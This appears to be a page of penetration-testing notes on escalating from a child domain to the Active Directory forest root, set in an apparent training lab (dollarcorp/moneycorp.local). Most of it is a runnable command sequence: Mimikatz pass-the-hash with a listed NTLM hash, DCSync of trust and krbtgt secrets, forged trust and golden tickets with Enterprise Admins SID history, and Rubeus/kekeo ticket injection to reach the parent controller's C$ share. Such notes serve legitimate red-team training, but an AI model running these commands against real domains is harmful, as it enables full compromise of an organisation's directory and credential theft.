Priv Esc - Across Trusts using Trust Tickets

  • Across Domains - Implicit two way trust relationship.

  • Across Forests - Trust relationship needs to be established.

  • You need to have domain admin in the current domain and wants to get enterprise admin for the parent domain

Priv Esc – Child to Parent

  • Child to Forest Root

  • Domains in same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains.

  • There are two ways of escalating privileges between two domains of same forest:

    • Krbtgt hash

    • Trust tickets

Child to Parent using Trust Tickets

• Child to Forest Root 
• Domains in same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains. 
• There are two ways of escalating privileges between two domains of same forest: 
   ◇ Krbtgt hash
   ◇ Trust tickets

You need to have domain admin in the current domain and wants to get enterprise admin for the parent domain


--------------------- Child to Parent using Trust Tickets---------------------

#Open Powershell as local admin
import-module invoke-mimikatz.ps1

#Get a Powershell with Domain admin
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'


#Child to Forest Root using Trust Tickets So, what is required to forge trust tickets is, obviously, the trust key.
#Look for [In] trust key from child to parent.

#In the new Powershell Domain Admin:
import-module invoke-mimikatz.ps1
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
or
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc


#FindDomainSID First SID of the command below
Import-Module powerview.ps1
Get-DomainSID

#Find EnterPrise Admins SID. Second SID of the command below
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain moneycorp.local

#We can run the command from a low privileged user
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-500 /rc4:ecae1085d19afe5186b213739e2267ad /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'


#cd to kekeo_old where the ticket was saved and do the following:
#Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket.


.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
#Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM) can be created as well.




#Use the TGS to access the targeted service (may need to use it twice).
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi
klist


#We got fileshare access:
ls \\mcorp-dc.moneycorp.local\c$



#Child to Forest Root using Trust Tickets We can use Rubeus too for same results! Note that we are still using the TGT forged initially
.\Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

ls \\mcorp-dc.moneycorp.local\c$

Child to Parent using krbtgt

• Child to Forest Root 
• Domains in same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains. 
• There are two ways of escalating privileges between two domains of same forest: 
   ◇ Krbtgt hash
   ◇ Trust tickets

You need to have domain admin in the current domain and wants to get enterprise admin for the parent domain


#Open Powershell as local admin
import-module invoke-mimikatz.ps1

#Get a Powershell with Domain admin
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'


#Get the krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'


#Use the krbtgt hash for the following command:

#FindDomainSID First SID of the command below
Import-Module powerview.ps1
Get-DomainSID

#Find EnterPrise Admins SID. Second SID of the command below
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain moneycorp.local

#Open Powershell as a low priv user to create the tgt
import-module invoke-mimikatz.ps1
 klist purge
Invoke-Mimikatz -Command ‘"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-500 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'


#Inject the ticket
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
klist


#Test the access
ls \\mcorp-dc.moneycorp.local\c$


gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local

PreviousPriv Esc – Across Forest using krbtgt TicketNextPriv Esc – DNSAdmins

Last updated

Was this helpful?